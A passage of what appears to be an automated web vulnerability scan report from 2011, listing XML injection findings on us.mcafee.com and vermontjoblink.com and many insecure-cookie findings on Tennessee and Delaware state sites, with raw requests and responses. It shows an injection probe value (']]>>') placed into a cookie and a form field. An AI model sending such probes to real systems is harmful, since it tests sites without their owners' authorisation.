session%5Fdata=%3CSessionData%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%09%3Cwt%5Fsource%3EOther%3C%2Fwt%5Fsource%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E86873%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E86873%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3CBasketflowid%3E0%3C%2FBasketflowid%3E%3C%2FSessionData%3E%0D%0A; Currency=56]]>>; SiteID=1;

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 29 Apr 2011 21:27:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5550
Content-Type: text/html
Expires: Thu, 28 Apr 2011 21:27:13 GMT
Set-Cookie: lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; domain=mcafee.com; path=/
Set-Cookie: langid=1; domain=mcafee.com; path=/
Set-Cookie: ASPSESSIONIDQSSSBDBD=IALEJJODFLDHFBJNMPKMBJFM; path=/
Cache-control: private
Connection: close

<html>
<head>
<title> McAfee Security</title>
<meta http-equiv="Content-Type" content="text/html">
<link rel="stylesheet" type="text/css" href="/common/stylesheets/general.css">
<script language=
...[SNIP]...
<?xml version="1.0" encoding="iso-8859-1"?>
...[SNIP]...

6.2. http://us.mcafee.com/root/basket.asp [SiteID cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://us.mcafee.com
Path:   /root/basket.asp

Issue detail

The SiteID cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the SiteID cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /root/basket.asp?affid=0& HTTP/1.1
Host: us.mcafee.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0&CampaignId=78228; s_cc=true; s_campaign=78228; s_nr=1304109967309-New; s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; CampaignId=86873; ASPSESSIONIDSQTRCCBC=KPLDIJODDCHEAHCOCAPBNDGC; ASPSESSIONIDSCARSBBC=LPHHDJODOEABGOHIPLKDDJDD; CookieInformation=locale=us; lBounceURL=http://home.mcafee.com/secure/cart/?offerId=266730&PkgQty=1; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1]]>>; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Locale=EN-US; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; AffID=0-0; Currency=56; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d266730%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; IscartemptySiteidAffid=no-1-0

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 29 Apr 2011 21:31:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5550
Content-Type: text/html
Expires: Thu, 28 Apr 2011 21:31:25 GMT
Set-Cookie: ASPSESSIONIDQQQQBDAD=CJJKHJODFBIMMMBEPDMAELJG; path=/
Cache-control: private

<html>
<head>
<title> McAfee Security</title>
<meta http-equiv="Content-Type" content="text/html">
<link rel="stylesheet" type="text/css" href="/common/stylesheets/general.css">
<script language=
...[SNIP]...
<?xml version="1.0" encoding="iso-8859-1"?>
...[SNIP]...

6.3. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [usvuserid parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The usvuserid parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the usvuserid parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=]]>>&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:26:09 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7. SSL cookie without secure flag set  previous  next
There are 162 instances of this issue:


7.1. https://apps.tn.gov/bizreg/bizregprog  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://apps.tn.gov
Path:   /bizreg/bizregprog

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bizreg/bizregprog?action=gotoRegisterBusiness HTTP/1.1
Host: apps.tn.gov
Connection: keep-alive
Referer: https://apps.tn.gov/bizreg/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 00:58:54 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Location: http://apps.tn.gov/bizreg/tax.jsp;jsessionid=5135D230630641F0714BF0702C635B61.portalprod1
Content-Length: 0
Set-Cookie: JSESSIONID=7C1C1CB77466893AF25C44D68EDC9054.portalprod1; Path=/bizreg
Set-Cookie: JSESSIONID=5135D230630641F0714BF0702C635B61.portalprod1; Path=/bizreg
Keep-Alive: timeout=30, max=5500
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8


7.2. https://apps.tn.gov/bizreg/tax.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://apps.tn.gov
Path:   /bizreg/tax.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bizreg/tax.jsp HTTP/1.1
Host: apps.tn.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AEF01406437498DCCCE8EB0A4BC568BD.portalprod1; __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:00 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 4949
Set-Cookie: JSESSIONID=458EE0883D635B75C12B63B9090B8580.portalprod1; Path=/bizreg
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<html lang="en-US"><!-- #BeginTemplate "/Templates/bizreg.dwt" --><!-- DW6 -->
<head>
<!-- #BeginEditable "doctitle" -->
<title>
...[SNIP]...

7.3. https://apps.tn.gov/biztax-app/login.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://apps.tn.gov
Path:   /biztax-app/login.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /biztax-app/login.html HTTP/1.1
Host: apps.tn.gov
Connection: keep-alive
Referer: https://apps.tn.gov/biztax/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:03:25 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 2889
Set-Cookie: JSESSIONID=5917367B2BC078AE01FCE9F4DDCB78BA.portalprod1; Path=/biztax-app
Keep-Alive: timeout=30, max=5500
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><!-- InstanceBegin templa
...[SNIP]...

7.4. https://apps.tn.gov/paams-app/index.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://apps.tn.gov
Path:   /paams-app/index.htm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paams-app/index.htm HTTP/1.1
Host: apps.tn.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AEF01406437498DCCCE8EB0A4BC568BD.portalprod1; __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:00 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 3132
Set-Cookie: JSESSIONID=FFF26F20EB9B38A02149ECC1A088ACF2.portalprod9; Path=/paams-app
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin tem
...[SNIP]...

7.5. https://apps.tn.gov/paams-app/recover/resetpassword.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://apps.tn.gov
Path:   /paams-app/recover/resetpassword.htm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paams-app/recover/resetpassword.htm HTTP/1.1
Host: apps.tn.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AEF01406437498DCCCE8EB0A4BC568BD.portalprod1; __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:00 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 2897
Set-Cookie: JSESSIONID=A7331F2AF1D25E9E95F58D50429AE95C.portalprod9; Path=/paams-app
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin tem
...[SNIP]...

7.6. https://apps.tn.gov/paams-app/recover/retrieveusermane.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://apps.tn.gov
Path:   /paams-app/recover/retrieveusermane.htm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paams-app/recover/retrieveusermane.htm HTTP/1.1
Host: apps.tn.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AEF01406437498DCCCE8EB0A4BC568BD.portalprod1; __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:01 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 2952
Set-Cookie: JSESSIONID=E8C7670E3CD6BE9451F68F8D14687A75.portalprod9; Path=/paams-app
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin tem
...[SNIP]...

7.7. https://assist.dhss.delaware.gov/PGM/ASP/SAACC.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SAACC.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SAACC.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=LCHJLMKBCBGEJHLNDKCANOHB;

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 12:49:08 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:16:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 12945
Content-Type: text/html
Expires: Sat, 30 Apr 2011 12:16:42 GMT
Set-Cookie: ASPSESSIONIDCCQADQAB=GEPDNOPBOFHGBLHKMGMMOFAC; path=/
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="EN">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Pragma" CONTEN
...[SNIP]...

7.8. https://assist.dhss.delaware.gov/PGM/ASP/SACOM.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SACOM.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SACOM.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=LCHJLMKBCBGEJHLNDKCANOHB;

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 12:49:08 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:16:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 15110
Content-Type: text/html
Expires: Sat, 30 Apr 2011 12:16:42 GMT
Set-Cookie: ASPSESSIONIDCCQADQAB=KEPDNOPBNEHEIGLBKDOCIABI; path=/
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="EN">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Pragma" CONTEN
...[SNIP]...

7.9. https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC001.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SC001.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: http://de.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:29 GMT; path=/
Date: Sat, 30 Apr 2011 00:36:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 10198
Content-Type: text/html
Expires: Sat, 30 Apr 2011 00:36:04 GMT
Set-Cookie: ASPSESSIONIDACRDBQAB=OAHJLMKBGIPGBEPPPHDCDBNC; path=/
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html LANG="en">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTE
...[SNIP]...

7.10. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC002.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SC002.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=LCHJLMKBCBGEJHLNDKCANOHB;

Response

HTTP/1.1 302 Object moved
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 12:49:08 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:16:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Location: SMPRB.asp
Content-Length: 130
Content-Type: text/html
Expires: Sat, 30 Apr 2011 12:16:42 GMT
Set-Cookie: ASPSESSIONIDCCQADQAB=OEPDNOPBNPCHGDCKHCLEEKDM; path=/
Cache-control: no-cache

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="SMPRB.asp">here</a>.</body>

7.11. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC020.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SC020.asp?hdn_Language=EN&hdn_ProcessId=1 HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: assist-persist=170663852.51305.0000

Response

HTTP/1.1 302 Object moved
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 02:17:18 GMT; path=/
Date: Sat, 30 Apr 2011 01:44:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: SC002.asp?hdn_SessionId=3117824831351042911214452&hdn_ApplicationNum=
Content-Length: 194
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACRDBQAB=MCHJLMKBFHJENFPIGFNLJLOK; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="SC002.asp?hdn_SessionId=3117824831351042911214452&amp;hdn_ApplicationNum=">here</a>.</body>

7.12. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC020.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SC020.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=LCHJLMKBCBGEJHLNDKCANOHB;

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 12:49:08 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:16:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCQADQAB=EFPDNOPBJHAIFLCHBDHBDKEP; path=/
Cache-control: private


7.13. https://assist.dhss.delaware.gov/PGM/ASP/SC024.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC024.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SC024.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=LCHJLMKBCBGEJHLNDKCANOHB;

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 12:49:08 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:16:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 10129
Content-Type: text/html
Expires: Sat, 30 Apr 2011 12:16:42 GMT
Set-Cookie: ASPSESSIONIDCCQADQAB=MFPDNOPBMJLFMKBMDONPECJF; path=/
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html LANG="en">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTE
...[SNIP]...

7.14. https://assist.dhss.delaware.gov/PGM/ASP/SC031.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC031.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SC031.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=LCHJLMKBCBGEJHLNDKCANOHB;

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 12:49:08 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:16:43 GMT
Server: Microsoft-IIS/6.0
